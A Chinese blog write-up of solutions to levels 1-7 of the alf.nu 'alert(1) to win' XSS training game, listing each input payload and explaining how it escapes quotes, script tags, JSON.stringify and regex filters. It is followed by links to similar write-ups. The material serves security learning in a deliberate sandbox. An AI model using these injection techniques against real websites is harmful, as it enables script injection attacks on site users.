alf.nu/alert1 XSS 1-7

最新推荐文章于 2019-07-22 00:12:35 发布
最新推荐文章于 2019-07-22 00:12:35 发布
阅读量329 收藏
点赞数
分类专栏: Web安全 文章标签: Web安全 XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sopora/article/details/82981711
版权

NO.1 Warmup

Input:
");alert(1)//

NO.2 Adobe

Input:
\");alert(1)//

本关对输入的双引号进行了转义,再加一个反斜杠转义回来即可

NO.3 JSON

Input:
</script><script>alert(1);//

本关使用JSON.stringify()进行过滤,反斜杠也被过滤掉,但可以用script标签进行分割

NO.4 JavaScript

Input:
%22);alert(1)//

javascript伪协议:

<a href="javascript:void(0)">Content</a>

 

当浏览器装载这样的URL时,它将执行这个URL中包含的Javascript代码,并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档类型完全相同

因为最后传递到url中所以用url编码绕过

NO.5 Markdown

Input:
[[1|http://onerror='alert(1)']]

本题主要考察正则有关知识
先是过滤掉了小于号和双引号,然后
[[1|http://onerror='alert(1)']]“.replace(/(http:\/\/\S+)/g, ‘$1‘);
结果为:
[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>
然后
[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>“.text = text.replace(/[[(\w+)|(.+?)]]/g, ‘<img alt="$2" src="$1.gif">‘);
结果:<img alt="<a href="http://onerror='alert(1)'" src="1.gif">">http://onerror='alert(1)']]</a>

注意这里要用onerror而不是onload因为图片注定会加载失败

NO.6 DOM

Input:
Comment# --><script>alert(1)</script><!--

Function.apply(obj,args):

obj:这个对象将代替Function类里this对象
args:这个是数组,它将作为参数传给Function(args–>arguments)
apply方法能劫持另外一个对象的方法,继承另外一个对象的属性

先用document.createComment()创建注释,然后再绕过注释

NO.7 Callback

Input:
'#';alert(1);//

被单引号包围的双引号会被当成字符串处理,所以在这里前后都使用单引号,绕过双引号的限制

—— soporbear.github.io/2018/06/03/alf.nu-XSS

forestdwelling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS练习(alf.nu/alert1)
qq_25899635的博客
01-03 356
慢慢来,学习以及练习一些"技巧" ***燥起来… *** Warmap 没有任何过滤,直接进行闭合,; payload,还是截图方便 Adobe escape函数将输入的引号"转换为\\*,对引号进行了转义。如果输入为\",就会转换为\\\",这个时候,本来要转义的引号变成转义反斜杠了,从而绕过这个简单的转义触发… JSON 这个级别通过JSON.stringify进行对象序列化,说白了就是把...
alf.nu/alert1 writeup(1-7)
一个安全研究员
03-24 1249
1.warmup 链接:https://alf.nu/alert1 热身题嘛,没有进行任何过滤,就简单的闭合一下双引号就行了: payload: 1”);alert(1)// 2.adobe 题目: function escape(s) { s = s.replace(/&quot;/g, '\\&quot;'); return '&amp;lt;script&amp;gt;console.log(&quot;' +...
xss练习,alf.nu/alert1,1-12
weixin_30635053的博客
10-14 348
觉得自己很菜,故找一些题来做,随便找了下。记一下通关攻略https://alf.nu/alert1 第一关 题目:warmup function escape(s) { return '<script>console.log("'+s+'");</script>'; } 题解:");alert(1)// 分析:简单闭合一下双引号即可 第二关...
【CTF WEBXSS-https://alf.nu/alert1
weixin_30828379的博客
10-10 500
XSS练习平台 https://alf.nu/alert1 Warmup 1”);alert(1)// Adobe 1”);alert(1)// JSON </script>// JavaScript %22);alert(1)// Markdown [[a|http://onerror=alert(1)//]] DOM Comment#--><img src=a...
alert(1) to win
weixin_30834019的博客
12-28 535
一、 function escape(s) { return '<script>console.log("'+s+'");</script>'; } 两种思路:1、结束 console.log,然后执行 alert(1);2、直接让 alert(1) 在console.log()中执行。 结束 console.log 1、payload:");ale...
alf.io:alf.io-用于会议,展览,研讨会,聚会的开源门票预订系统
02-03
如果您想自己构建和部署alf.io,我们强烈建议您使用分支,因为该分支包含可用于生产的代码。 先决条件 您应该已经安装了Java版本11 (例如或任何其他发行版)来构建和运行alf.io。 请注意,对于构建过程,需要JDK。...
alf.io开源票务预订系统
最新发布
03-27
./gradlew clean 使用多个配置文件运行 必须在命令行中指定项目属性,例如 ./gradlew -Pprofile=dev :bootRun 本地“bootRun”任务具有以下先决条件: 在 localhost:5432 上启动并运行的 PostgreSQL(版本 10 或...
cli-checkin-alf.io:命令行应用程序可通过great.alf.io票务预订系统用于登机
04-07
要求Java 11 USB QR码扫描仪作为HID,具有德语键盘布局选项-e,--event <arg> event name -k,--key <arg> api key -l,--list display upcoming events -u,--url <arg> alf.io ticket system url跑步java -jar alf-io-...
Der Übergang von isolierten dimeren [AlF4/1F2/2]2 Gruppen aus kantenverknüpften Oktaedern zu unendlichen linearen [text removed][AlF4/1F2/2]-Ketten eckenverknüpfter Oktaeder in den tetragonalen Verbindungen (Sr, M)AlF5 (M [equals] Ca, Ba) - der Einfluß de
06-29
Der Übergang von isolierten dimeren [AlF4/1F2/2]2 Gruppen aus kantenverknüpften Oktaedern zu unendlichen linearen [text removed][AlF4/1F2/2]-Ketten eckenverknüpfter Oktaeder in den tetragonalen ...
alf.io-docker:Dockerfiles 创建运行 alf.io 实例所需的所有 docker 镜像
06-30
alf.io-docker Dockerfiles 创建运行 alf.io 实例所需的所有 docker 镜像先决条件安装 。 在 Mac 或 Windows 上安装并运行TL;DR,我只想要一个实例启动并运行从 docker hub 下载所有 alf.io docker 镜像 docker pull...
【20171025早】alert(1) to win 练习
weixin_30672295的博客
10-25 156
本人黑绝楼,自称老黑,男,25岁,曾经在BAT工作过两年,但是一直都是底层人员,整天做重复性工作,甚敢无趣,曾和工作十年之久的同事聊天,发现对方回首过往,生活是寡淡如水,只有机械性工作。旋即老黑毅然决然辞职,现赋闲在家,打算从软件开发工程师转为安全研究,开这个博客记录平生,以飨各位看官。 老黑我无房,无车,无女友,身高一米七七,微胖,为计算机奋斗了四五年,可惜进步甚微,现决心发愤图强,在...
XSS练习平台【a/lert(1) to win】
taozijun的博客
07-11 4474
题目来源:https://alf.nu/alert1 这一系列的题目目标为alert(1),也就是找出一个XSS利用点。 页面会给出一段需要绕过的过滤函数,Output回显函数生成的HTML代码,方便绕过; Console out是在控制台输出的值,就是console.log里输出的值 ps:请用chorme进行练习,有的题目在firefox上会出错 一. warmup    没有任...
escape.alf.nu XSS Challenges 8-15 之进阶的XSS
giantbranch的专栏
05-29 7298
本文链接:http://blog.csdn.net/u012763794/article/details/51526725 上次讲了challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js 废话不
alert(1) to win】不完全攻略
ajxi63204的博客
05-24 491
alert(1) to win 一个练习XSS的平台,地址:https://alf.nu/alert1 Warmup 给出了一段JavaScript代码 function escape(s) { return '<script>console.log("'+s+'");</script>'; } 对s没有任何校验,payload为 ...
xss练习
Reset
11-23 1041
做了一个xss弹窗练习,不知道有的地方理解的或者操作的对不对,只是记录一些过程,如果有错还请指出。 https://xss.twosecurity.xyz/topic1?name=1   附上地址 要确定xss是在什么地方发生的,一个小方法就是先输入一个文本,自己要记住。然后查看源码,ctrl+f,查找就可以确定位置了。有的没有输入框就是在url的参数中。 1.输出在html中: 可以...
escape.alf.nu XSS Challenges 0-7 之一步步学XSS
giantbranch的专栏
05-28 9806
本文链接:http://blog.csdn.net/u012763794/article/details/51507593 以下挑战来源于:http://escape.alf.nu/ 你可能需要html,css,javascript的知识,没有的赶紧学吧 challenge 0 function escape(s) { // Warmup. return
前端安全-XSS攻击、CSRF攻击
wrc的专栏
07-22 430
先来玩一个小游戏,输入一定的值,令到XSS攻击成功,执行alert(1)的代码 https://alf.nu/alert1 warmup,第一题很简单,直接");alert(1);("就能过 adobe,第二题对"进行了转义,但可以用\令到转义字符\失效,之后再加上alert(1)即可过关。参考答案\");alert(1);// json,第三题尝试把输入数据转换为JSON,但没有对<...
prompt(1) to win -----XSS学习笔记
热门推荐
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
http://regex.alf.nu/ 非标准答案
xindoo
01-19 3815
网站链接这是一个练正则表达式的好文章,有几个题目都比较意思,以下是参考答案,如果有得分更高的答案请告诉我,大家交流一下。Plain strings (207)                             fooAnchors (206)                                     ick$Ranges (202)                       ...
Ynew=(Y0'*alf-g0/norm(dg))*alf; 什么意思
05-24
- alf: 步长因子 那么,这个式子的意思是:使用初始点的梯度向量和梯度变化量,计算出一个新的点的向量表示 Ynew。这个新点的位置是在初始点沿着梯度方向走一段距离(即步长)后得到的。其中,步长的大小由步长因子...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值